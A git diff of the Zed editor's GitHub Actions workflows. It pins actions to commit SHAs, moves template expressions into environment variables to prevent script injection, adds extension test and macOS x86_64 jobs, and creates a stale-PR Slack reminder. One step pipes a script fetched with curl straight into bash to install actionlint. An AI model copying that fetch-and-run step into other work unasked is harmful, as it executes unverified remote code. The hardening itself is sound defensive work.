actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_node @@ -196,7 +196,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -240,7 +240,7 @@ jobs: TIMESTAMP_SERVER: http://timestamp.acs.microsoft.com steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_sentry @@ -274,11 +274,11 @@ jobs: GIT_LFS_SKIP_SMUDGE: '1' steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_nix_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: 
namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: nix - name: nix_build::build_nix::install_nix @@ -306,11 +306,11 @@ jobs: GIT_LFS_SKIP_SMUDGE: '1' steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_nix_store_macos - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: path: ~/nix-cache - name: nix_build::build_nix::install_nix diff --git a/.github/workflows/run_cron_unit_evals.yml b/.github/workflows/run_cron_unit_evals.yml index e57b54e4f2249b92630b2d3636ce2316a0814625..7bb7f79473eb4dae170eb18edd454b7ae35d13e8 100644 --- a/.github/workflows/run_cron_unit_evals.yml +++ b/.github/workflows/run_cron_unit_evals.yml @@ -16,12 +16,12 @@ jobs: model: - anthropic/claude-sonnet-4-5-latest - anthropic/claude-opus-4-5-latest - - google/gemini-3-pro + - google/gemini-3.1-pro - openai/gpt-5 fail-fast: false steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -29,18 +29,16 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: 
./script/clear-target-dir-if-larger-than 250 - name: steps::setup_sccache diff --git a/.github/workflows/run_tests.yml b/.github/workflows/run_tests.yml index 97e918aab37f3dc375eb259f416f7998b4b196fd..13d036b128666700d45ae39013b2dd8f3da5abf9 100644 --- a/.github/workflows/run_tests.yml +++ b/.github/workflows/run_tests.yml @@ -19,7 +19,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: ${{ github.ref == 'refs/heads/main' && 2 || 350 }} @@ -35,7 +35,7 @@ jobs: git fetch origin "$GITHUB_BASE_REF" --depth=350 COMPARE_REV="$(git merge-base "origin/${GITHUB_BASE_REF}" HEAD)" fi - CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" ${{ github.sha }})" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" check_pattern() { local output_name="$1" @@ -103,23 +103,40 @@ jobs: check_pattern "run_action_checks" '^\.github/(workflows/|actions/|actionlint.yml)|tooling/xtask|script/' -qP check_pattern "run_docs" '^(docs/|crates/.*\.rs)' -qP check_pattern "run_licenses" '^(Cargo.lock|script/.*licenses)' -qP - check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests)))' -qvP + check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests))|extensions/)' -qvP + # Detect changed extension directories (excluding extensions/workflows) + CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true) + # Filter out deleted extensions + EXISTING_EXTENSIONS="" + for ext in $CHANGED_EXTENSIONS; do + if [ -f "$ext/extension.toml" ]; then + EXISTING_EXTENSIONS=$(printf '%s\n%s' "$EXISTING_EXTENSIONS" "$ext") + fi + done + CHANGED_EXTENSIONS=$(echo "$EXISTING_EXTENSIONS" | sed '/^$/d') + if [ -n 
"$CHANGED_EXTENSIONS" ]; then + EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))') + else + EXTENSIONS_JSON="[]" + fi + echo "changed_extensions=$EXTENSIONS_JSON" >> "$GITHUB_OUTPUT" outputs: changed_packages: ${{ steps.filter.outputs.changed_packages }} run_action_checks: ${{ steps.filter.outputs.run_action_checks }} run_docs: ${{ steps.filter.outputs.run_docs }} run_licenses: ${{ steps.filter.outputs.run_licenses }} run_tests: ${{ steps.filter.outputs.run_tests }} + changed_extensions: ${{ steps.filter.outputs.changed_extensions }} check_style: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') runs-on: namespace-profile-4x8-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -139,6 +156,21 @@ jobs: uses: crate-ci/typos@2d0ce569feab1f8752f1dde43cc2f2aa53236e06 with: config: ./typos.toml + - name: run_tests::fetch_ts_query_ls + uses: dsaltares/fetch-gh-release-asset@aa37ae5c44d3c9820bc12fe675e8670ecd93bd1c + with: + repo: ribru17/ts_query_ls + version: tags/v3.15.1 + file: ts_query_ls-x86_64-unknown-linux-gnu.tar.gz + - name: run_tests::run_ts_query_ls + run: |- + tar -xf "$GITHUB_WORKSPACE/ts_query_ls-x86_64-unknown-linux-gnu.tar.gz" -C "$GITHUB_WORKSPACE" + "$GITHUB_WORKSPACE/ts_query_ls" format --check . || { + echo "Found unformatted queries, please format them with ts_query_ls." 
+ echo "For easy use, install the Tree-sitter query extension:" + echo "zed://extension/tree-sitter-query" + false + } timeout-minutes: 60 clippy_windows: needs: @@ -147,7 +179,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -175,9 +207,12 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_tests == 'true' runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -185,14 +220,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -214,7 +247,7 @@ jobs: runs-on: namespace-profile-mac-large steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -222,7 +255,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -238,6 +271,39 @@ jobs: - name: 
steps::show_sccache_stats run: sccache --show-stats || true timeout-minutes: 60 + clippy_mac_x86_64: + needs: + - orchestrate + if: needs.orchestrate.outputs.run_tests == 'true' + runs-on: namespace-profile-mac-large + steps: + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + - name: steps::setup_cargo_config + run: | + mkdir -p ./../.cargo + cp ./.cargo/ci-config.toml ./../.cargo/config.toml + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup + - name: steps::install_rustup_target + run: rustup target add x86_64-apple-darwin + - name: steps::setup_sccache + run: ./script/setup-sccache + env: + R2_ACCOUNT_ID: ${{ secrets.R2_ACCOUNT_ID }} + R2_ACCESS_KEY_ID: ${{ secrets.R2_ACCESS_KEY_ID }} + R2_SECRET_ACCESS_KEY: ${{ secrets.R2_SECRET_ACCESS_KEY }} + SCCACHE_BUCKET: sccache-zed + - name: steps::clippy + run: ./script/clippy --target x86_64-apple-darwin + - name: steps::show_sccache_stats + run: sccache --show-stats || true + timeout-minutes: 60 run_tests_windows: needs: - orchestrate @@ -245,7 +311,7 @@ jobs: runs-on: self-32vcpu-windows-2022 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -285,9 +351,12 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_tests == 'true' runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -295,14 +364,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: 
steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_node @@ -310,7 +377,7 @@ jobs: with: node-version: '20' - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 250 - name: steps::setup_sccache @@ -344,7 +411,7 @@ jobs: runs-on: namespace-profile-mac-large steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -352,7 +419,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -361,7 +428,7 @@ jobs: with: node-version: '20' - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 300 - name: steps::setup_sccache @@ -373,6 +440,8 @@ jobs: SCCACHE_BUCKET: sccache-zed - name: steps::cargo_nextest run: cargo nextest run --workspace --no-fail-fast --no-tests=warn${{ needs.orchestrate.outputs.changed_packages && format(' -E "{0}"', needs.orchestrate.outputs.changed_packages) || '' }} + - name: steps::cargo_build_visual_tests + run: cargo build -p zed --bin 
zed_visual_test_runner --features visual-tests - name: steps::show_sccache_stats run: sccache --show-stats || true - name: steps::cleanup_cargo_config @@ -385,20 +454,21 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_tests == 'true' runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_cargo_config @@ -428,9 +498,12 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_tests == 'true' runs-on: namespace-profile-8x16-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -438,14 +511,12 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -473,7 +544,7 @@ jobs: runs-on: namespace-profile-8x16-ubuntu-2204 steps: - name: steps::checkout_repo - uses: 
actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -481,7 +552,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -510,13 +581,16 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_tests == 'true' runs-on: namespace-profile-2x4-ubuntu-2404 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -542,9 +616,12 @@ jobs: - orchestrate if: needs.orchestrate.outputs.run_docs == 'true' runs-on: namespace-profile-8x16-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -552,7 +629,7 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -564,8 +641,6 @@ jobs: jobSummary: false - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: 
./script/generate-action-metadata @@ -592,11 +667,11 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup @@ -611,7 +686,7 @@ jobs: runs-on: namespace-profile-2x4-ubuntu-2404 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: run_tests::check_scripts::run_shellcheck @@ -620,8 +695,14 @@ jobs: name: run_tests::check_scripts::download_actionlint run: bash <(curl https://raw.githubusercontent.com/rhysd/actionlint/main/scripts/download-actionlint.bash) - name: run_tests::check_scripts::run_actionlint - run: | - ${{ steps.get_actionlint.outputs.executable }} -color + run: '"$ACTIONLINT_BIN" -color' + env: + ACTIONLINT_BIN: ${{ steps.get_actionlint.outputs.executable }} + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 + with: + cache: rust + path: ~/.rustup - name: run_tests::check_scripts::check_xtask_workflows run: | cargo xtask workflows @@ -643,7 +724,7 @@ jobs: GIT_COMMITTER_EMAIL: ci@zed.dev steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false fetch-depth: 0 @@ -667,7 +748,25 @@ jobs: with: input: crates/proto/proto/ against: https://github.com/${GITHUB_REPOSITORY}.git#branch=${BUF_BASE_BRANCH},subdir=crates/proto/proto/ + - name: run_tests::check_postgres_and_protobuf_migrations::buf_lint + run: buf lint 
crates/proto/proto + - name: run_tests::check_postgres_and_protobuf_migrations::check_protobuf_formatting + run: buf format --diff --exit-code crates/proto/proto timeout-minutes: 60 + extension_tests: + needs: + - orchestrate + if: needs.orchestrate.outputs.changed_extensions != '[]' + permissions: + contents: read + strategy: + matrix: + extension: ${{ fromJson(needs.orchestrate.outputs.changed_extensions) }} + fail-fast: false + max-parallel: 1 + uses: ./.github/workflows/extension_tests.yml + with: + working-directory: ${{ matrix.extension }} tests_pass: needs: - orchestrate @@ -675,6 +774,7 @@ jobs: - clippy_windows - clippy_linux - clippy_mac + - clippy_mac_x86_64 - run_tests_windows - run_tests_linux - run_tests_mac @@ -685,6 +785,7 @@ jobs: - check_docs - check_licenses - check_scripts + - extension_tests if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') && always() runs-on: namespace-profile-2x4-ubuntu-2404 steps: @@ -698,23 +799,43 @@ jobs: if [[ "$2" != "skipped" && "$2" != "success" ]]; then EXIT_CODE=1; fi } - check_result "orchestrate" "${{ needs.orchestrate.result }}" - check_result "check_style" "${{ needs.check_style.result }}" - check_result "clippy_windows" "${{ needs.clippy_windows.result }}" - check_result "clippy_linux" "${{ needs.clippy_linux.result }}" - check_result "clippy_mac" "${{ needs.clippy_mac.result }}" - check_result "run_tests_windows" "${{ needs.run_tests_windows.result }}" - check_result "run_tests_linux" "${{ needs.run_tests_linux.result }}" - check_result "run_tests_mac" "${{ needs.run_tests_mac.result }}" - check_result "doctests" "${{ needs.doctests.result }}" - check_result "check_workspace_binaries" "${{ needs.check_workspace_binaries.result }}" - check_result "check_wasm" "${{ needs.check_wasm.result }}" - check_result "check_dependencies" "${{ needs.check_dependencies.result }}" - check_result "check_docs" "${{ needs.check_docs.result }}" - check_result "check_licenses" "${{ 
needs.check_licenses.result }}" - check_result "check_scripts" "${{ needs.check_scripts.result }}" + check_result "orchestrate" "$RESULT_ORCHESTRATE" + check_result "check_style" "$RESULT_CHECK_STYLE" + check_result "clippy_windows" "$RESULT_CLIPPY_WINDOWS" + check_result "clippy_linux" "$RESULT_CLIPPY_LINUX" + check_result "clippy_mac" "$RESULT_CLIPPY_MAC" + check_result "clippy_mac_x86_64" "$RESULT_CLIPPY_MAC_X86_64" + check_result "run_tests_windows" "$RESULT_RUN_TESTS_WINDOWS" + check_result "run_tests_linux" "$RESULT_RUN_TESTS_LINUX" + check_result "run_tests_mac" "$RESULT_RUN_TESTS_MAC" + check_result "doctests" "$RESULT_DOCTESTS" + check_result "check_workspace_binaries" "$RESULT_CHECK_WORKSPACE_BINARIES" + check_result "check_wasm" "$RESULT_CHECK_WASM" + check_result "check_dependencies" "$RESULT_CHECK_DEPENDENCIES" + check_result "check_docs" "$RESULT_CHECK_DOCS" + check_result "check_licenses" "$RESULT_CHECK_LICENSES" + check_result "check_scripts" "$RESULT_CHECK_SCRIPTS" + check_result "extension_tests" "$RESULT_EXTENSION_TESTS" exit $EXIT_CODE + env: + RESULT_ORCHESTRATE: ${{ needs.orchestrate.result }} + RESULT_CHECK_STYLE: ${{ needs.check_style.result }} + RESULT_CLIPPY_WINDOWS: ${{ needs.clippy_windows.result }} + RESULT_CLIPPY_LINUX: ${{ needs.clippy_linux.result }} + RESULT_CLIPPY_MAC: ${{ needs.clippy_mac.result }} + RESULT_CLIPPY_MAC_X86_64: ${{ needs.clippy_mac_x86_64.result }} + RESULT_RUN_TESTS_WINDOWS: ${{ needs.run_tests_windows.result }} + RESULT_RUN_TESTS_LINUX: ${{ needs.run_tests_linux.result }} + RESULT_RUN_TESTS_MAC: ${{ needs.run_tests_mac.result }} + RESULT_DOCTESTS: ${{ needs.doctests.result }} + RESULT_CHECK_WORKSPACE_BINARIES: ${{ needs.check_workspace_binaries.result }} + RESULT_CHECK_WASM: ${{ needs.check_wasm.result }} + RESULT_CHECK_DEPENDENCIES: ${{ needs.check_dependencies.result }} + RESULT_CHECK_DOCS: ${{ needs.check_docs.result }} + RESULT_CHECK_LICENSES: ${{ needs.check_licenses.result }} + RESULT_CHECK_SCRIPTS: ${{ 
needs.check_scripts.result }} + RESULT_EXTENSION_TESTS: ${{ needs.extension_tests.result }} concurrency: group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} cancel-in-progress: true diff --git a/.github/workflows/run_unit_evals.yml b/.github/workflows/run_unit_evals.yml index 2259d2498b76f3627e6784f55023e2fbfe855cbb..1bf75188832668f40a24c4d3452940bf05fcd3fd 100644 --- a/.github/workflows/run_unit_evals.yml +++ b/.github/workflows/run_unit_evals.yml @@ -24,7 +24,7 @@ jobs: runs-on: namespace-profile-16x32-ubuntu-2204 steps: - name: steps::checkout_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd with: clean: false - name: steps::setup_cargo_config @@ -32,18 +32,16 @@ jobs: mkdir -p ./../.cargo cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::cache_rust_dependencies_namespace - uses: namespacelabs/nscloud-cache-action@v1 + uses: namespacelabs/nscloud-cache-action@a90bb5d4b27522ce881c6e98eebd7d7e6d1653f9 with: cache: rust path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest - uses: taiki-e/install-action@nextest + uses: taiki-e/install-action@921e2c9f7148d7ba14cd819f417db338f63e733c - name: steps::clear_target_dir_if_large run: ./script/clear-target-dir-if-larger-than 250 - name: steps::setup_sccache diff --git a/.github/workflows/slack_notify_first_responders.yml b/.github/workflows/slack_notify_first_responders.yml index a6f2d557a574778aea6c2a90f9721b5a41bd0724..538d02b582f18db627693b62e439f4142ea29056 100644 --- a/.github/workflows/slack_notify_first_responders.yml +++ b/.github/workflows/slack_notify_first_responders.yml @@ -17,8 +17,9 @@ jobs: id: check-label env: LABEL_NAME: ${{ github.event.label.name }} + FIRST_RESPONDER_LABELS: 
${{ env.FIRST_RESPONDER_LABELS }} run: | - if echo '${{ env.FIRST_RESPONDER_LABELS }}' | jq -e --arg label "$LABEL_NAME" 'index($label) != null' > /dev/null; then + if echo "$FIRST_RESPONDER_LABELS" | jq -e --arg label "$LABEL_NAME" 'index($label) != null' > /dev/null; then echo "should_notify=true" >> "$GITHUB_OUTPUT" echo "Label '$LABEL_NAME' requires first responder notification" else diff --git a/.github/workflows/stale-pr-reminder.yml b/.github/workflows/stale-pr-reminder.yml new file mode 100644 index 0000000000000000000000000000000000000000..1c3c0aec623c68c3c99803ef2421e73dbec9cf8e --- /dev/null +++ b/.github/workflows/stale-pr-reminder.yml @@ -0,0 +1,115 @@ +# Stale PR Review Reminder +# +# Runs daily on weekdays (second run at 8 PM UTC disabled during rollout) and posts a Slack summary of open PRs that +# have been awaiting review for more than 72 hours. Team-level signal only — +# no individual shaming. +# +# Security note: No untrusted input is interpolated into shell commands. +# All PR metadata is read via gh API + jq. +# +# Required secrets: +# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel + +name: Stale PR Review Reminder + +on: + schedule: + - cron: "0 14 * * 1-5" # 2 PM UTC weekdays + # - cron: "0 20 * * 1-5" # 8 PM UTC weekdays — enable after initial rollout + workflow_dispatch: {} + +permissions: + contents: read + pull-requests: read + +jobs: + check-stale-prs: + if: github.repository_owner == 'zed-industries' + runs-on: ubuntu-latest + timeout-minutes: 5 + env: + REPO: ${{ github.repository }} + # Only surface PRs created on or after this date. Update this if the + # review process enforcement date changes. 
+ PROCESS_START_DATE: "2026-03-19T00:00:00Z" + steps: + - name: Find PRs awaiting review longer than 72h + id: stale + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + CUTOFF=$(date -u -v-72H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \ + || date -u -d '72 hours ago' +%Y-%m-%dT%H:%M:%SZ) + + # Get open, non-draft PRs with pending review requests, created before cutoff + # but after the review process start date (to exclude pre-existing backlog) + gh api --paginate \ + "repos/${REPO}/pulls?state=open&sort=updated&direction=asc&per_page=100" \ + --jq "[ + .[] | + select(.draft == false) | + select(.created_at > \"$PROCESS_START_DATE\") | + select(.created_at < \"$CUTOFF\") | + select((.requested_reviewers | length > 0) or (.requested_teams | length > 0)) + ]" > /tmp/candidates.json + + # Filter to PRs with zero approving reviews + jq -r '.[].number' /tmp/candidates.json | while read -r PR_NUMBER; do + APPROVALS=$(gh api \ + "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \ + --jq "[.[] | select(.state == \"APPROVED\")] | length" 2>/dev/null || echo "0") + + if [ "$APPROVALS" -eq 0 ]; then + jq ".[] | select(.number == ${PR_NUMBER}) | {number, title, author: .user.login, created_at}" \ + /tmp/candidates.json + fi + done | jq -s '.' > /tmp/awaiting.json + + COUNT=$(jq 'length' /tmp/awaiting.json) + echo "count=$COUNT" >> "$GITHUB_OUTPUT" + + - name: Notify Slack + if: steps.stale.outputs.count != '0' + env: + SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }} + COUNT: ${{ steps.stale.outputs.count }} + run: | + # Build Block Kit payload from JSON — no shell interpolation of PR titles. + # Why jq? PR titles are attacker-controllable input. By reading them + # through jq -r from the JSON file and passing the result to jq --arg, + # the content stays safely JSON-encoded in the final payload. 
+ PRS=$(jq -r '.[] | "• — \(.title) (by \(.author), opened \(.created_at | split("T")[0]))"' /tmp/awaiting.json) + + jq -n \ + --arg count "$COUNT" \ + --arg prs "$PRS" \ + '{ + text: ($count + " PR(s) awaiting review for >72 hours"), + blocks: [ + { + type: "section", + text: { + type: "mrkdwn", + text: (":hourglass_flowing_sand: *" + $count + " PR(s) Awaiting Review >72 Hours*") + } + }, + { + type: "section", + text: { type: "mrkdwn", text: $prs } + }, + { type: "divider" }, + { + type: "context", + elements: [{ + type: "mrkdwn", + text: "PRs awaiting review are surfaced daily. Reviewers: pick one up or reassign." + }] + } + ] + }' | \ + curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \ + -H 'Content-Type: application/json' \ + -d @- +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/track_duplicate_bot_effectiveness.yml b/.github/workflows/track_duplicate_bot_effectiveness.yml index fa1c80616cb6133a7a4cad8841bbaad03115ff58..0d41a6070610ce9e9cc3faa06af78145bc9caec1 100644 --- 